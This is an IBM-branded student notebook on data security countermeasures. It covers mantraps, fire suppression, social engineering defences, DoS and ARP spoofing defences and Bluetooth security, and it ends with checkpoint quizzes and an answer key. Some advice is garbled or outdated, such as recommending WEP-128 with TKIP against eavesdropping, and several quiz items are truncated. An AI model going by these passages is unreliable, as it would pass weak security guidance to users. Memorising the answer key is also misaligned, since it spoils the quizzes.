Mantrap: Mantrap are high-security installations that use intermediate access control mechanism and
demand visual identification and authentication to allow access. Furthermore, it only allows only a limited
number (one or two) of people to enter into the facility at a time making it hard to be accessed by malicious
beings. It also serves to physically hold in an unauthorized, potentially malicious person, until authorities
reach the facility. An illustration of a mantrap is shown in Fig 7. A security guard at the entry can ensure to
carry out the process of identity verification. Also, to properly develop a mantrap, high-strength doors and
locks, and bulletproof glass must be installed. Armed guard and video surveillance are placed for high
security and military environments. Even inside the facility, authentication should be required for the person to
access the facility

Student Notebook

IBM Power Systems
Notes:
The diagram illustrates the working of a mantrap. A mantrap only allows a few number of personnel into the
organization at a time. If the number of personnel entering exceeds the assigned number of people then the
mantrap locks the extra person in the locked doors which can be activated remotely as well. this process has
been shown in the figure.

V10.1
Student Notebook
Uempty

IBM Power Systems

– Perimeter Security: The first line of defense for the security model of an organization
• The idea is to secure the outer periphery of the building so that no potential hostile person can gain
access to the resources present inside
Notes:
Perimeter Security: The first line of defense for the security model of an organization is perimeter security
which could be either technological or physical. The idea is to secure the outer periphery of the building so
that no potential hostile person can gain access to the resources present inside.

Student Notebook

IBM Power Systems

– Hardware Security
• Laptops are provided with a built-in security slot where a cable lock can be added
• A lock on the back must also be placed
Notes:
Hardware Security: Hardware security involves applying physical security modifications to secure the
system(s) and prevent them from leaving the facility. If you add a cable lock between a laptop and a desk
reduces the chances of someone just walking away with the invaluable database. Laptops are provided with
a built-in security slot where a cable lock can be added making it hard to be moved from the premises. Also,
to avoid the hard drive from falling into malicious hands or damaging internal components, a lock on the back
cover must be installed. The lock that connects through that slot can also go to a cable that then connects to
a desk or other solid fixture to keep the entire PC from being carried away.

V10.1
Student Notebook
Uempty

IBM Power Systems

– Security Zone
• Areas that require restricted access can be broken down into smaller area
• An alarm system can be installed that can communicate with security personnel
Notes:
Security Zone: In a security zone of a building, each and every access is monitored and authenticated
individually. Areas that require restricted access can be broken down into smaller area that can be named as
security zones. An alarm system can be installed that can communicate with security personnel if an
unauthenticated intrusion is detected. It also alerts and notifies the security personnel that which security
zone (part of the building e.g. particular floor) they should be looking at.
Individual zones are created for separate zones and separate burglar alarms are provided to enhance
security. In a residence, it would be normal for the bedroom to be assigned a zone of its own so movement
here can occur while other parts of the house may be set on a motion detector.

Student Notebook

IBM Power Systems
Notes:
This diagram illustrates the working of a in-place zones which will ensure network security. The connection
provided to different departments depend on the zone in which they have been classified. Different zones
have different network jurisdiction associated with them.

V10.1
Student Notebook
Uempty

IBM Power Systems

– Partitioning
• Through partitioning, one entity can be isolated from another
• This discussion will elaborate on the possibilities partitioning provides
Notes:
Partitioning: Access control in a building can be controlled by appropriate partitioning. Separating the
important functioning area allows the information and property to be kept under check.
Through partitioning, one entity can be isolated from another. That entity can be physical (one room can be
shut from another in a building) or logical (those who can access one set of data cannot access another). This
discussion will elaborate on the possibilities partitioning provides

Student Notebook

IBM Power Systems
Notes:
The diagram illustrates the portioning of the network according to the plan of the organization. This system is
employed so that the jurisdiction to the network provided to different departments can be underlined and
network can also be provided accordingly.

V10.1
Student Notebook
Uempty

IBM Power Systems

– Biometric
• Biometric systems use these traits to allow access in to a facility
• These systems, when integrated with security-oriented computer systems can be used to record
the attempts
Notes:
Biometric: Unique biological traits, such as retina patterns, handprints and fingerprints etc. have been widely
used to differentiate as well as identify individuals. Biometric systems use these traits to allow access in to a
facility. Facial recognition applications and keystroke recognition programs can also be used as part of
access management systems. These systems, when integrated with security-oriented computer systems can
be used to record the attempts which have been made to access the system. All the mechanism which have
been installed to secure the parameters must always be under surveillance as there are chances of
individuals attempting to bypass them. Fingerprint reader in laptops has become common these days. Also,
these technologies have become cheaper with time

Student Notebook

IBM Power Systems

– Power System: Power and interference problems are likely to affect computer systems.
• There is a wide band of power characteristics required for the power systems to operate and
ensure smooth functioning
Notes:
Power System: Power and interference problems are likely to affect computer systems. The input AC power
in a computer system is converted into DC as the electronic system require steady DC voltage. The there is a
wide band of power characteristics required for the power systems to operate and ensure smooth functioning.

V10.1
Student Notebook
Uempty

IBM Power Systems

– EMI Shielding
• Shielding can be done against electronic emissions from disrupting operations of a computer
system
• A Faraday cage provides the necessary protection against external EM waves
Notes:
EMI Shielding: Electromagnetic waves are present all around us. But being in a particular bandwidth of
frequencies, it doesn’t seem like a big concern. However, electronic appliances do feel their presence and
their functioning is affected by interfering signals. Shielding can be done against electronic emissions from
disrupting operations of a computer system. A Faraday cage provides the necessary protection against
external EM waves. In a Faraday cage, an electrically conductive wire is woven into a mesh (cage) around
the computer room. EM signals can neither leave nor enter the cage. Electromechanical objects like motors
cause EMI that can cause component failure, spikes or circuit overload. In order to minimize the generation of
EMI, shielding and grounding must be done of all the signal lines. Also, distance should be kept from
electromechanical devices to protect computer systems.

Student Notebook

IBM Power Systems
Notes:
The diagram illustrates EMI picking up in the data cable. This abrupt flow of EMI can cause a device to get
damaged. Also the data signal’s flow has been described in the figure. It must be noticed that the flow of EMI
is very abrupt when the motor is in place.

V10.1
Student Notebook
Uempty

IBM Power Systems

– Hot & Cold Aisles
• With a hot aisle, hot air outlets are used to cool the equipment, while with cold aisles; cold air
intake is used to cool it
• Combining the two, there will be cold air intake from below the aisle and hot air outtake above it,
providing constant circulation
• It is important that the hot air exhausting from one aisle of racks not be the intake air pulled in by
the next row of racks, or overheating will occur
Notes:
Hot & Cold Aisles: In server rooms, there are often multiple rows of servers located in racks. The rows of
servers are known as aisles, and they can be cooled as hot aisles and cold aisles. With a hot aisle, hot air
outlets are used to cool the equipment, while with cold aisles; cold air intake is used to cool it. Combining the
two, there will be cold air intake from below the aisle and hot air outtake above it, providing constant
circulation.
It is important that the hot air exhausting from one aisle of racks not be the intake air pulled in by the next row
of racks, or overheating will occur. Air handlers must move the hot air out, while cold air, usually coming from
beneath a raised floor, is supplied as the intake air.

Student Notebook

IBM Power Systems
Notes:
The figure illustrates both the hot and cold aisle working together and securing the organization. Both the hot
and the cold aisle are kept in line with each other. Cold air is thrown by the cold aisle and hot air is thrown by
hot aisle and when they are combined they produce the temperature suitable for the equipment.

V10.1
Student Notebook
Uempty

IBM Power Systems

– Fire Suppression
• Fire extinguishers: Fire extinguishers are known for their portability
• Other fixed systems: The building systems contain the fixed systems in them
Notes:
Fire Suppression: In a computer center design, suppression of fire is an important consideration. The act of
suppressing or extinguishing fire is known as fire suppression. Two types of fire-suppression systems that are
widely used are as follows:
• Fire extinguishers: Fire extinguishers are known for their portability. The use and selection of fire
extinguishers is very important. Fire extinguishers, classified according to types of fire they put out are as
shown in the table.
These types of extinguishers can be combined to create a multi-purpose extinguisher which will have
many capabilities contained in a singular bottle. A-B, B-C and ABC are the most common extinguishers
that are multi-purpose. “PASS” method, recommended to use a fire extinguisher, is explained below:
‘P’ stands for pull where an individual will pull the pin on the top of extinguisher
‘A’ stands for aim where the individual will aim the extinguisher towards the burning area
‘S’ stands for squeeze where the individual will squeeze the handle and release the extinguishing agent
‘S’ stands for sweep where the individual has to sweep the extinguisher across the fire

Student Notebook
• Other fixed systems: The building systems contain the fixed systems in them. The fixed systems are most
commonly the combination of systems of fire-suppression and the detectors of fire. In a fixed system, the
detectors of fire are triggered because of either a very fast change in the temperature or because of too
much smoke. Either fire-suppressing gas or water sprinklers are used by the systems of fire suppression.
Overhead nozzles are employed in the water sprinklers. Modern buildings use this method a lot. This is
because systems of water sprinklers are inexpensive, reliable and needs a very little maintenance. The
water-based systems can cause extensive damage to the electrical equipments. So for preventing it,
carbon dioxide was used in gas-based systems that were replaced later by Halon gas. But, use of Halon
gas was prevented as it damages the ozone layer. The gases that are acceptable environmentally are
now commonly used under FM200 fire suppression system. The gas system dislocates the oxygen which
is present in the room, as a result fire is stopped as oxygen is a major necessitate factor of fire. The
systems which are gas-based however require environments sealed to operate which is its major
drawback. To maintain this, special systems of ventilation are installed usually in gas systems which
minimize the circulation of air when the gas is released. Another limitation is that the gas systems are
very expensive. To avoid unnecessary costs they are implemented usually in rooms where computers are
located or in areas where water can cause technological damage which can be catastrophic

V10.1
Student Notebook
Uempty

IBM Power Systems

– Natural Countermeasures: Examples of natural countermeasures include the following:
• Terminal of natural gas
• Surrounded by water on each side
• Organization situated on the waterway
• Organization surrounded by hills
Notes:
Natural Countermeasures: After consideration of intrinsic vulnerabilities, we begin to consider the effect that
natural countermeasures have on the vulnerability. Examples of natural countermeasures include the
following:
A liquefied natural gas terminal that is surrounded on the land side with a storm berm also has a natural
countermeasure against the entry of conventional vehicle.
- A facility on a small island with only ferry access makes access and getaway more difficult as it
creates a “choke point” through which all threat actors must come and go.
- Any facility located on a waterway is only accessible by watercraft on that side.
- A facility located on a hillside cliff has very limited access from that side.

Student Notebook

IBM Power Systems

– Man-Made Countermeasures
• Physical Countermeasures
• Electrical Countermeasures
• Operational Countermeasures
Notes:
Man-Made Countermeasures: It is three type of countermeasures: physical, electrical and operational.
- Physical Countermeasures: This type of countermeasure include doors, lighting, fences, locks,
gates, signage, walls and other barriers that can be deployed. If the physical countermeasures are
not maintained properly or are not even employed they can add upto a certain level of vulnerability.
To reduce vulnerabilities, locks of high quality should be employed. It should be kept proper care of
that all the physical countermeasures are in good condition as a 6 feet well maintained fences can be
a good countermeasure than a 8 feet poorly maintained fence
- Electrical Countermeasures: All the access control systems, communication systems, alarm systems
and video systems come under the category of electronic countermeasure. The communication
system include telephones, two-way radios, electronic signage and public address systems etc.
Visible light weaponry, long range weaponry, electronic jamming equipment etc. also fall in the
category of electrical countermeasures. Vulnerabilities can be reduced in depth if electrical
countermeasures are employed
- Operational Countermeasures: All the security staffing like patrols, posts etc., security dogs, policy
and procedure of security, investigations, counter surveillance program etc. fall in the category of
operational countermeasures. If the security guards solutions are implemented poorly then it will
actually add to the current vulnerability then to reduce it. Also it is imminent for an organization to
have security policy and procedure as it helps in implementing and employing security measures in a
proper way

V10.1
Student Notebook
Uempty

IBM Power Systems

– Insider Threat Countermeasures: Prevention is vastly preferable to detection and attempted
remediation
• Detection, Analysis and Identification of Misuse
• Desired Responses to Detected Anomalies and Misuses
Notes:
Insider Threat Countermeasures: Prevention is vastly preferable to detection and attempted remediation.
Detection, Analysis and Identification of Misuse: In the absence of good prevention, it is of course
desirable to detect known defined types of misuse as well as otherwise unknown types of anomalous misuse
(seemingly significant deviation from expected normal behavior). The latter type of detection could be
particularly important in identifying early-warning signs of misuse. Because there are potential differences in
the data that may need to be collected, there may be some difference in the approach to detection of misuse
among the different types of misuse, depending on the relative roles of insiders and insider misuse. If insider
can exist only within local confines. It may be unnecessary to collect packets and other network data-which
themselves constitute potential security and privacy risks. If privileged logical insiders are also able to access
their systems remotely and are in some sense then distinguishable from outsiders at least geographically or
from their external Internet presence, then networking data may also be relevant. Clearly, the presence of
strong authentication has an impact on carrying out insider misuse detection
Desired Responses to Detected Anomalies and Misuses: In some cases of outsider attacks, it is more
important to stave off the attacks than to let them continue. In other cases, it may be appropriate to let the
attacks continue but to somehow confine their effects for insiders. In some cases of insider misuse, it may be
particularly important to detect the misuses, to allow it to continue, and monitor it carefully- without giving
away the fact that detailed surveillance is being done

Student Notebook

IBM Power Systems
• Hacking & Social Networking Countermeasures

– Phone Attack Countermeasures: One should not disclose any personal information when such
phone call is received
• There are chances that caller ID may not tell the true identity of the caller
• The risk of a telephone based social engineer attack is high
Notes:
Phone Attack Countermeasures: One should not disclose any personal information when such phone call
is received. There are chances that caller ID may not tell the true identity of the caller as it is possible to spoof
the caller ID systems. If personal information is requested on a call, one can disconnect the call and then
initiate a call to confirm the request for information is legitimate. This way it can be made sure that the calling
party is with a proper business or organization and that the call came from a trusted source.
The risk of a telephone based social engineer attack is high in an organization if it has someone answering
phone calls all day. A social engineer is familiar with computer systems and their integration with telephone
systems, caller IDs, etc. they are proficient enough to hide their identity and pose as different people and
seem as legitimate as possible. An organization must be aware of the kind of phone system it uses so as to
keep track of internal extensions and of people having access to the phone systems. A solid policy for
handling calls is required in an organization prevent such attacks

V10.1
Student Notebook
Uempty

IBM Power Systems

– Online Attacks Countermeasures
• Attacks can be countered by deleting the mail before it downloads any malware in the system
• They just have to get the user to click on a certain page that may trigger downloading of a script or
other credentials
• A little awareness goes a long way as the user can know the situation need handling
Notes:
Online Attacks Countermeasures: Online scams through emails asking for personal information (such as
bank account number) is a common occurrence. However, looking closely into these mails, it can be deduced
that such mails offer no legitimacy. Such attacks can be countered by deleting the mail before it downloads
any malware in the system. Social engineers can also get into a system by the way of Interweb. They just
have to get the user to click on a certain page that may trigger downloading of a script or other credentials. If
the user is not properly trained so as to identify any malpractice going in the browser, it increases the
vulnerability and serves as an easy way of exploitation by a social engineer. Pop-up blockers, anti-spyware
and antivirus serve as important and effective tools against such threats. However, a program is not able to
detect phony pages so the user must be made aware of these things. A little awareness goes a long way as
the user can know the situation need handling and can close the browser before any malware infects the
system. Users who need to be online on a regular basis should be briefed of such threats and attacks by
conducting a training session for such users.

Student Notebook

IBM Power Systems

– Dumpster Diving Countermeasures
• It should be made sure that important confidential documents should be shredded completely
• It is recommended that the dumpster installed in an organization is well-structured
• One wouldn’t leave a credit card application with their name on it on top of the trash pile out in the
dumpster or on the side of the street
Notes:
Dumpster Diving Countermeasures: Important information should be destroyed completely so that it
cannot be retrieved afterwards from the destroyed copies. It should be made sure that important confidential
documents should be shredded completely and not left lying around carelessly. It is recommended that the
dumpster installed in an organization is well-structured and equipped with a lock mechanism. Also it should
be kept in check which people have access to the dumpster. Simply throwing away into a paper shredder also
protects against the abuse of corporate documents. This even applies to the home life when checking a mail.
One wouldn’t leave a credit card application with their name on it on top of the trash pile out in the dumpster
or on the side of the street for anyone to pick up and send away for being responsible with an organization’s
documents is just as important.

V10.1
Student Notebook
Uempty

IBM Power Systems

– Reverse Social Engineering Countermeasures
• Emails, phones, business cards can be used as media for advertising to fix the issues on behalf of
the organization
• The attacker, after the advertising stage, would finally cause the problem they claim to fix
Notes:
Reverse Social Engineering Countermeasures: Reverse Social Engineering involves an attack which is
harder to detect, more intricate and more advanced than other social engineering attacks. At first, the attacker
uses a passive approach to gain information using Google or any organization’s website. This step doesn’t
necessarily qualify as a reverse social engineering attack. After gaining access to something regarding the
needs of the organization and then advertise to fix the requisite issue. Emails, phones, business cards can be
used as media for advertising to fix the issues on behalf of the organization. Posing as a representative of the
organization, the attacker can fool a user. This step can be dealt with by verifying if the concerned
organization has recruited any new administrator. The attacker, after the advertising stage, would finally
cause the problem they claim to fix and then wait for someone to fall for it and call them to fix the issue. If the
attacker is contacted, it puts the attacker in a position such that the user has to comply with their demands.
However, if the user is aware of such attacks, this scenario can be prevented. Detection of reverse social
engineering attack is a difficult task as the attackers have a good reconnaissance. If any kind of anomaly is
detected, it should be reported to a verified administrator instead of falling prey to such attacks.

Student Notebook

IBM Power Systems

– Persuasion Attempts Countermeasures
• To counter this kind of attempt, the identity of people who aren’t allowed inside the organization
should be verified
• Also, people who expect visitors to come should let everyone know via email
• Also, if there is more than one exit door (e.g. exit to a parking lot or smoking area), it should be
made sure that these doors should not be used for unauthorized entry
Notes:
Persuasion Attempts Countermeasures: A social engineer’s best disguise is to fit in the crowd and pretend
to belong in an organization’s environment. Thus, instead of doing an in-person attack which could have
severe repercussions, the social engineer has to fake identity to look like one of the people frequent to the
company. To counter this kind of attempt, the identity of people who aren’t allowed inside the organization
should be verified. Also, people who expect visitors to come should let everyone know via email. However, if
a substantial amount of visitors is encountered during a single day, this countermeasure loses its purpose.
Also, if there is more than one exit door (e.g. exit to a parking lot or smoking area), it should be made sure
that these doors should not be used for unauthorized entry. A security guard can be placed or video
surveillance can be used to monitor these doors so that events like tailgating or suspicious people can be
monitored.

V10.1
Student Notebook
Uempty

IBM Power Systems
• Wireless Network Security Countermeasures

– Against DOS
• The time taken by the database to give response get delayed when server resources are
overloaded by database DOS
• Query rates, rates incurred for connection and various other rates for each user of the database
are limited by the server resource with the help of Connection Controls
Notes:
Against DOS: Multiple level protection i.e. at network, application, and database levels is requires against
DOS. Specifically focusing on database response, the recommended countermeasures are response timing
control, IPS, access control query and control of connection rate deployment.
- The time taken by the database to give response get delayed when server resources are overloaded
by database DOS
- Query rates, rates incurred for connection and various other rates for each user of the database are
limited by the server resource. This prevention step is accomplished by Connection Controls.
- Database servers can be crashed if attackers exploit platform vulnerabilities. Such attacks can be
prevented by IPS and protocol validation.
- Query access control is provided by Dynamic Profiling that can detect any queries beforehand and
prevent DOS attacks

Student Notebook

IBM Power Systems

– Against Spoofing
• The MAC address appears on a port and without authentication, the mapping cannot be altered.
• A lot of congestion can be saved by making ARP request unicast
• Protection against tampering of newly forged APR packets can be achieved by sending ARP
request packets
Notes:
Against Spoofing: ARP packets are broadcasted without any authentication mechanism. This easy
availability feature makes them susceptible to ARP poisoning or ARP spoofing. MAC binding feature
equipped network switches takes the first MAC address and stores it. The MAC address appears on a port
and without authentication, the mapping cannot be altered. Alternatively, ARP negotiation can be centralized,
for e.g. though a DHCP. A lot of congestion can be saved by making ARP request unicast. If additional
authentication is introduced, sender can be identified and security against packet tampering can be ensured.
Protection against tampering of newly forged APR packets can be achieved by sending ARP request packets
to a server with IP-MAC address mapping and is centralized. Now, an ARP response is sent to the host by the
server. A digital signal which is strong in nature is also send along with it. Server response is stored on a
timestamp and an acknowledgement is sent in an encrypted form by the host. This aids in preventing
spoofing by disabling the source routing of all the routers that are used internally.

V10.1
Student Notebook
Uempty

IBM Power Systems

– Against Flooding Attack
• The queue between the SYN ACK connections will increase if the time out waiting of the host is
decreased
• All flooding attacks a can be dealt with by using an integrated force of Host-based Intrusion
Detection System (HIDS) and Network-based Intrusion Detection System (NIDS)
• Critical servers and network segment(s) are places under HIDS and NIDS, respectively.
Notes:
Against Flooding Attack: The nature of the IP addresses cannot be determined if the mail server is on a
public web access. Thus, no solution can be put forward when the IP address is inimical. The queue between
the SYN ACK connections will increase if the time out waiting of the host is decreased for a three way
handshake and employ vendor software patches. Intrusion detection system is also a choice but does not
come forth as a clear cut contacts.
All flooding attacks a can be dealt with by using an integrated force of Host-based Intrusion Detection System
(HIDS) and Network-based Intrusion Detection System (NIDS). Critical servers and network segment(s) are
places under HIDS and NIDS, respectively. Administrator can be notified immediately if any suspicious
activity arises. Any known attacks can be detected using signature detection scheme. Log files, intercept the
requests of the operating system for the resources available in the system.

Student Notebook

IBM Power Systems

– Against D-DoS Attack
• Antivirus software can be installed to keep out the Email worms
• For example: When spoofed packets which have source addresses of fake stature are not allowed
to leave the network, then it is made sure that whatever comes out from the network only has
source addresses belonging to the network by using an Egress filter (outbound) in the router or the
network firewall
• An Ingress (inbound) confirms that the source addresses of the packets coming to the network are
not present inside network
Notes:
Against D-DoS Attack: Software vendors provide security patches which can be used as a measure of
precaution against D-Denial of Service attacks. Antivirus software can be installed to keep out the Email
worms. Another level of security can be attained for D-DoS attacks by outbound and inbound filtering of
firewalls. For example: When spoofed packets which have source addresses of fake stature are not allowed
to leave the network, then it is made sure that whatever comes out from the network only has source
addresses belonging to the network by using an Egress filter (outbound) in the router or the network firewall.
An Ingress (inbound) confirms that the source addresses of the packets coming to the network are not
present inside network. An unsophisticated attack is accompanied by traffic with a specific signature. If a
large traffic is originated from a service provider, a portion of legitimate activity can be allowed to move
through by blocking the traffic temporarily which has come from a certain source. But the damage which takes
place while blocking the traffic cannot be avoided. Below are the steps which can prevent a network such that
it doesn’t attack another network:
- The packets must be filtered which come into the network is sent for a broadcast address
- In order to prevent smurf attacks, it must be made sure that all the internal routers are turned off
- If a packet has a source code which has originated in a network, then the packet must be blocked

V10.1
Student Notebook
Uempty

IBM Power Systems

– Against Eavesdropping
• Access control can be implemented by using IEEE802.1x security protocol
• Security protocols divide the network into authentication server, authenticator and supplicant such
that when looked into a wireless network
• Since there is an involvement of the usage of a RADIUS server in EAP (Extensible Authentication
Protocol) authentication
Notes:
Against Eavesdropping: The quality of authentication and encryption should be good so as to prevent the
leakage of data details. Access control can be implemented by using IEEE802.1x security protocol. Also, to
prevent eavesdropping, it should be ensured that 802.1x RADIUS authentication is activated and data is
encrypted with TKIP using WEP-128 bit encryption. Security protocols divide the network into authentication
server, authenticator and supplicant such that when looked into a wireless network, the wireless device is the
supplicant, the Remote Access Dial-In User Service (RADIUS) server acts as the authentication server and
the authenticator is the AP. Since there is an involvement of the usage of a RADIUS server in EAP
(Extensible Authentication Protocol) authentication, it acts as a secondary layer of protection. EAP is used
between the authenticator and the supplicant (for the communication) by a port-based authentication which is
IEEE802.1x. EAP verifies a user to be recognized and authenticated so as to grant wireless access by the
server, thus making EAP a user-based authentication and providing enterprise level security to the network.
Protected EAP with MSCHAPv2 authentication can als be used to increase level of security. Regular checks
should be made for signal leaks outside the building and leakage, if present, should be eliminated or reduced
by adjusting the transmitter power.

Student Notebook

IBM Power Systems
• Bluetooth Device Countermeasures

– Bluetooth PIN
• It can also be used to generate keys between two devices
– Device Authentication
• Incorporating application-level software that requires password authentication to secure the device
will add an extra layer of security
Notes:
Bluetooth Device
Hardware and software security solutions are the two categories into which Bluetooth technical
countermeasures fall. Device authentication and PIN are the areas on which software solutions focusses on
and, link keys and device address of the Bluetooth are the main areas of focus when it comes to hardware
solutions.
Bluetooth PIN: For authenticating the device, PIN is used by the Bluetooth devices. The process of
generation of key is generated by the PIN. It can also be used to generate keys between two devices. It is
essential that security administrators should ensure that Bluetooth devices use PINs other than the default or
lowest, setting (e.g., 000)
Device Authentication: Since Bluetooth device can store and automatically access link-level PINs from
memory, a Bluetooth device should employ device authentication as an extra layer of security. Incorporating
application-level software that requires password authentication to secure the device will add an extra layer of
security.

V10.1
Student Notebook
Uempty

IBM Power Systems

– Frequency Hopping: The use of FHSS is to inherit the Bluetooth design
• This solution is not completely reliable as it provides only very low degree of protection in reality
– Biometrics
– Other Measures
Notes:
Frequency Hopping: The use of FHSS is to inherit the Bluetooth design. FHSS is a hardware solution which
allows devices such that communications can be made even in areas of very high interference of
electromagnetic waves. However one should not rely completely on this solution as it provides only very low
degree of protection in reality.
Biometrics: Biometrics is another type of hardware solution for securing Bluetooth device. Voice
authentication is the best biometric solution available to reduce Bluetooth vulnerabilities.
Other Measures: Some of the current software solutions available for Bluetooth include Acter AG, ActerBlue,
Blue-socket, Blue Access, BlueShield, Blue Cell, etc.

Student Notebook

IBM Power Systems

– Blue-Bugging: The countermeasures for a Blue-Bugging attack are as follows:
• Automatic power off capability
• Using RF signatures
– Updating latest firmware/software on vulnerable Bluetooth devices
Notes:
Blue-Bugging: The countermeasures for a Blue-Bugging attack are as follows:
Automatic power off capability: The power of Bluetooth devices, with fixed PIN codes, should turn their power
off automatically if no connection is made successfully in a predefined connection time.
Using RF signatures: Alien RF signatures are distinguished from legitimate ones using a sample RF
signature from each legitimate device. This technique is used by every transmitter, as each of them has a
unique RF signature used to identify the legit and alien RF signatures. Prior to accepting any connections,
signal processing capabilities can be employed in Bluetooth devices to keep a check on alien RF signatures.
This technique, however, is has cost factor if multiple Bluetooth devices are required for support.
Updating latest firmware/software on vulnerable Bluetooth devices: During the bad software implementations
conducted by mobile phone manufacturers in summer of 2004, it was reported that the Bluetooth security
flaws present in the authentication and data transfer mechanisms were fixed and hence the Bluetooth mobile
software after that was assumed safe. It is necessary to update latest software on Bluetooth devices that
present with any vulnerability

V10.1
Student Notebook
Uempty

IBM Power Systems

– Bluejacking
• it is extremely important for mobile phone users across the globe to be prepared with some
effective countermeasures
• One of the most effective countermeasures against bluejacking is to simply disable Bluetooth on a
mobile phone by going into options
Notes:
Bluejacking: Bluejacking is probably one of the easiest and most commonly executed mobile phone related
attack. Hence, it has become extremely important for mobile phone users across the globe to be prepared
with some effective countermeasures. One of the most effective countermeasures against bluejacking is to
simply disable Bluetooth on a mobile phone by going into options. Unfortunately, this would also means that
user will no longer be able to use any Bluetooth enabled accessories or devices with their mobile phone.
However, a more practical countermeasure is to configure the Bluetooth setting and put their phone in the
Undiscoverable or Hidden mode. Once they have paired the user’s mobile phone with any Bluetooth enabled
devices or accessories that they want to use it with, then the user can set its options to the Undiscoverable
mode or hidden mode. This will ensure that when the attacker searches for Bluetooth devices, a mobile
phone will not show up. At the same time one can continue using Bluetooth on their phone to connect to other
devices. Based on their mobile phone manufacturer, the following steps can be followed to put a phone in the
Undesirable mode
• Select the Menu button to browse to the Bluetooth menu> Bluetooth Settings.
• Select the My phone’s Visibility option and set it to the Hidden mode.
• Especially when one is in a crowded public place one’s level of alertness should only increase. When one
receives the warning prompt that a new contact or business card has been received, one can prevent
bluejacking by simply not accepting that incoming message.

Student Notebook
• It is also a very good idea to change the name that it displays to other Bluetooth devices. If one retains,
the default name then it makes it easier for attackers to find specific private information about a phone
like manufacturer, version etc. Moreover, it allows an attacker to easily identify whether a phone is
vulnerable or not.
• There is no permanent solution that a user can implement to counter Bluejacking without the help of the
mobile phone handset manufacturers.
.

V10.1
Student Notebook
Uempty

IBM Power Systems
1. What is the role of a countermeasure?

– To analyse the threats
– To store data in case of a threat
– To assess the vulnerability in a system
– To minimize and mitigate the risks and thus the amount of data breaches are minimized substantially
2. Which of the following is a countermeasure against malware?

– DMZ
– Anti-virus
– Biometric
Notes:
1. …
2. …

Student Notebook

IBM Power Systems
3. What is the function of connection control?

– It prevents server resource overload by limiting connection rates, query rates, and other variables for
each database user
– It prevents attacker from exploiting known software vulnerabilities to create DOS. Buffer overflow, for
example, is a common platform vulnerability that may be exploited to crash database servers
– It provides query access control to detect any unauthorized queries that may lead to DOS. DOS
attacks targeting platform vulnerabilities, for example, would be likely to trigger both IPS and Dynamic
Profile violations
– It overloads server resources lead to delayed database responses
4. What is the function of IPS and Protocol Validation?

each database user
Profile violations
Notes:
3. …
4. ….

V10.1
Student Notebook
Uempty

IBM Power Systems
5. What is the function of Dynamic Profiling?

each database user
Profile violations
6. Which of the following is a countermeasure for cross-site script forgery?

– Check and validate all form fields, hidden fields, headers, cookies, query strings, and parameters
against a rigorous specification
– Implement a stringent security policy
– Filter the script output to defeat XSS vulnerabilities and prevent them from being transmitted to users
Notes:
5. …
6.

Student Notebook

IBM Power Systems
7. What is the full form of DMZ?

– Decentralized Mantrap Zone
– Demilitarized Metric Zone
– Demilitarized Zoom
– Demilitarized Zone
8. What is the full form of IPS?

– Intrusion Protection System
– Intruder Prevention System
– Intrusion Prevention System
9. Which type of fire extinguisher in used against paper and wood fire?
– Type A
– Type B
– Type C
– Type E
Notes:
7. …
8. …
9.

V10.1
Student Notebook
Uempty

IBM Power Systems

Notes:

Student Notebook

V10.1
Student Notebook
AP
Appendix A. Checkpoint solutions
Unit 1, "Data Security Threats"
Solutions for Figure 1-84, "Checkpoint (1 of 4)," on page 1-87
Checkpoint solutions (1 of 4) IBM ICE (Innovation Centre for Education)

IBM Power Systems
1. Bluebugging is associated to which wireless device?

– Infrared
– Wi-Fi
– The answer is Bluetooth
– ZigBee
2. Which bug forced Amazon reboot its EC2 instances?

– The answer is Xen bug
– Shellshock bug
– Heartbleed bug
– Software bug
3. The art of manipulating people so they give up confidential information is called?

– Hacking
– The answer is Social engineering
– Packet Sniffing
– Phishing
© Copyright IBM Corp. 2015 Appendix A. Checkpoint solutions A-1

Student Notebook

IBM Power Systems
4. Frequency Analysis is included in which technique?

– The answer is Code-breaking technique
– Code-attacking technique
– Code-simplifying technique
– Code-revealing technique
5. A resource is changed or deleted without authorization in?

– Spoofing
– Repudiation
– The answer is Tampering
– Fuzzing
6. In which technique values and actions are inserted unexpectedly as an application’s input
to crash it down?
– Spoofing
– Repudiation
– Tampering
– The answer is Fuzzing
A-2 IT Data Security © Copyright IBM Corp. 2015

V10.1
Student Notebook
AP Solutions for Figure 1-86, "Checkpoint (3 of 4)," on page 1-89

IBM Power Systems
7. Which of the following is a cryptographic threat?

– Bluebugging
– Botnets
– The answer is Birthday Attack
8. Which of the following is a network based threat?

– Bluebugging
– The answer is Botnets
– Tampering

Student Notebook

IBM Power Systems
9. Polymorphic is a?
– The answer is Virus
– Worms
– Trojan
– Bug
10. Which are the two different channels which are most vulnerable in the modern times?
– Physical storage and Data networks
– Data storage and Physical networks
– The answer is All of the above

V10.1
Student Notebook
AP Unit 2, "Data Security Threat Techniques"

IBM Power Systems
1. Malware threat technique can be carried out in how many steps?

– 4
– The answer is 5
– 3
– 7
2. Which of the following option shows the steps of malware threat technique in correct
order?
– The answer is Entry, Distribution, Exploit, Infect, Execute
– Distribution, Entry, Exploit, Infect, Execute
– Exploit, Entry, Exploit, Infect, Execute
– Infect, Entry, Exploit, Infect, Execute
3. Which of the following is a step of phising?

– Fake login page
– Creating phishing.php file
– Creating index.html page
– The answer is All of the above

Student Notebook

IBM Power Systems
4. Which of the following option shows the steps of session hijacking in correct order?
– The answers is Tracking the Connection, Desynchronizing the Connection, Injecting the
Attacker’s Packet
– Desynchronizing the Connection, Tracking the Connection, Injecting the Attacker’s Packet
– Injecting the Attacker’s Packet, Tracking the Connection, Injecting the Attacker’s Packet
5. How many steps are involved in blue-jacking?

– 5
– 4
– The answer is 7
– 10
6. Which of the following option shows the steps of buffer overflow in correct order?
– Entrance, Running Commands, Smashing the Stack
– Smashing the Stack, Entrance, Running Commands
– The answers is Entrance, Smashing the Stack, Running Commands
– Running Commands, Smashing the Stack, Entrance

V10.1
Student Notebook

IBM Power Systems
7. How many steps are involved in DOS attack?

– 3
– 6
– 5
– The answer is 4
8. How many steps are involved in Wi-Fi hacking?

– 4
– The answer is 5
– 6
– 3

Student Notebook

IBM Power Systems
9. Which of the following is not a step of cross-site script forgery?

– This sends malicious script back to the user’s Web browser
– The script host executes the malicious code
– This sends the sensitive data to the hacker’s computer
– The answer is None of the above
10. What is tailgating?

– When a malicious party sends a fraudulent email disguised as a legitimate email
– When one party lies to another to gain access to privileged data
– The answer is When an unauthorized party follows an authorized party into an otherwise
secure location, usually to steal valuable property or confidential information

V10.1
Student Notebook
AP Unit 3, "Countermeasures"

IBM Power Systems
